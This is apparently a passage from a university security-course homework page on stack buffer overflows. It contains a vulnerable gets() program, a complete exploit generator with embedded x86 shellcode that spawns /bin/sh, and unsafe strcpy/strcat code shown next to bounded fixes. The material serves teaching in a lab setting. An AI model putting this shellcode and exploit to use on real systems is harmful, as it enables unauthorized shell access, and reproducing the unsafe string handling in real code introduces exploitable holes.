int main(int argc, char* argv[ ])
{
char a[256];
gets( a );
printf("a=%s\n", a);
printf("&a=0x%x\n", &a);
}
[root@rh72 bufferOverflow]# ./boaddr
GETS
&a=0xbfffef50
#include <stdlib.h> #include <stdio.h> char sc[] = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80" "\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; int main(int argc, char **argv) { char large_string[288]; long *long_ptr = (long *) large_string; int i; for (i = 0; i < 72; i++) *(long_ptr + i) = (int) strtoul(argv[1], NULL, 16); for (i = 0; i < (int) strlen(sc); i++) large_string[i] = sc[i]; printf("%s", large_string); return 0; }
strcpy(record, user);
strcat(record, “:”);
strcat(record, cpw);
strncpy(record, user, MAX_STRING_LEN-1);
strcat(record, “:”);
strncat(record, cpw, MAX_STRING_LEN-1);
Email me the above answers and session data you capture as your homework deliverable. You can also save the answer as a web page (hw2.html) or word document (hw2.doc) in your cs591 directory on walrus.uccs.edu and email me just the url.
Hint: Please read the smashingHWHint.doc for detailed steps in using gdb to understand the smashing stack problems. http://cs.uccs.edu/~cs591/bufferOverflow/smashingHWHint.doc
Gnu Debugger (GDB) Quick Reference: http://cs.uccs.edu/~cs591/bufferOverflow/gdb.pdf
Note that internal rh72 and fc4 virtual machines were created for you on eas blade server running ESX vSphere.